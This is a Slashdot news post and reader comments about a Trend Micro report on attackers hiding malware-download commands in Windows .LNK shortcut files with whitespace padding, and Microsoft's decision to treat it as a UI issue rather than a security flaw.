Become a fan of Slashdot on Facebook

 


Forgot your password?
Close
typodupeerror
×
Security Microsoft Privacy Windows

Microsoft Isn't Fixing 8-Year-Old Shortcut Exploit Abused For Spying (theregister.com) 9

Posted by BeauHD from the PSA dept.
Trend Micro uncovered an eight-year-long spying campaign exploiting a Windows vulnerability involving malicious .LNK shortcut files, which attackers padded with whitespace to conceal commands. Despite being reported to Microsoft in 2023, the company considers it a UI issue rather than a security risk and has not prioritized a fix. The Register reports: The attack method is low-tech but effective, relying on malicious .LNK shortcut files rigged with commands to download malware. While appearing to point to legitimate files or executables, these shortcuts quietly include extra instructions to fetch or unpack and attempt to run malicious payloads. Ordinarily, the shortcut's target and command-line arguments would be clearly visible in Windows, making suspicious commands easy to spot. But Trend's Zero Day Initiative said it observed North Korea-backed crews padding out the command-line arguments with megabytes of whitespace, burying the actual commands deep out of sight in the user interface.

Trend reported this to Microsoft in September last year and estimates that it has been used since 2017. It said it had found nearly 1,000 tampered .LNK files in circulation but estimates the actual number of attacks could have been higher. "This is one of many bugs that the attackers are using, but this is one that is not patched and that's why we reported it as a zero day," Dustin Childs, head of threat awareness at the Zero Day Initiative, told The Register. "We told Microsoft but they consider it a UI issue, not a security issue. So it doesn't meet their bar for servicing as a security update, but it might be fixed in a later OS version, or something along those lines."

After poring over malicious .LNK samples, the security shop said it found the vast majority of these files were from state-sponsored attackers (around 70 percent), used for espionage or information theft, with another 20 percent going after financial gain. Among the state-sponsored crews, 46 percent of attacks came from North Korea, while Russia, Iran, and China each accounted for around 18 percent of the activity.

Microsoft Isn't Fixing 8-Year-Old Shortcut Exploit Abused For Spying More | Reply

Microsoft Isn't Fixing 8-Year-Old Shortcut Exploit Abused For Spying

Comments Filter:

  • I kind of agree. (Score:4, Informative)

    by PsychoSlashDot ( 207849 ) on Tuesday March 18, 2025 @09:38PM (#65243987)
    It's not much different from a .BAT file that's got the naughty bits at line/column 110,000. There's only so much you can do while allowing a general-purpose computer to do useful things. The answer is least-privilege permissions and blocking executables of all sorts at the network perimeter. Pretty sure .LNK is on the naughty list in Outlook for instance. Obfuscated shell scripts can impact any real OS, with the impact only mitigated by permissions.

    • Re: (Score:3)

      by mysidia ( 191772 )

      Yeah... LNK files are like executables. Better treat them as such: forbid them from being downloaded from the internet or opened if stored on an external USB drive. Also forbid receipt of archive files such as .ZIP containing LNK files.

      Also.. I got to ask: Why is there no length maximum for the shortcut target on a LNK file?
      I understand there are long filenames and they should be allowed, but allowing Megabytes of text seems bad.

      Why not add a limit that LNK files with targets longer than 65,535

  • Eh (Score:4, Insightful)

    by The MAZZTer ( 911996 ) <megazzt.gmail@com> on Tuesday March 18, 2025 @09:43PM (#65243997) Homepage
    It was shown you can do the same thing with the Run dialog. Get the user to paste something in there where the end of what they pasted looks benign but the beginning has malicious commands. There's only so much you can do to protect users from themselves. In this case, I would also have to ask, how do the LNK files get on the user's machine in the first place? It seems to me that's probably the piece that prevents this from being considered a security issue. As Raymond Chen (Microsoft employee) sometimes quotes Douglas Adams: "It rather involved being on the other side of this airtight hatchway." If a machine is already compromised, further "exploits" aren't really security issues at that point.

  • How would such a .LNK file come onto my computer? Asking for a friend ...

    Seriously, there must be minimum 2 steps:
    - I install the link/shortcut file, then I perfectly well know what it is doing
    - someone runs to my computer when I am on the toilet and installs it

    and now ---> someone has to execute it! And that would not be me, as I don't execute unknown stuff - actually do not have any unknown stuff.

  • So says the CIA and FBI.

  • if you already tricked the user into downloading a file and running it, just make it a malicious .exe

  • Why (Score:2)

    by vbdasc ( 146051 )

    is this "bug" 8-years old, instead of 30-years old? LNK files first appeared in Windows 95, if I remember correctly. What saves Windows 95 from being exploited? Inability to put megabytes of junk in the LNK?

Slashdot Top Deals

When bad men combine, the good must associate; else they will fall one by one, an unpitied sacrifice in a contemptible struggle. - Edmund Burke

Close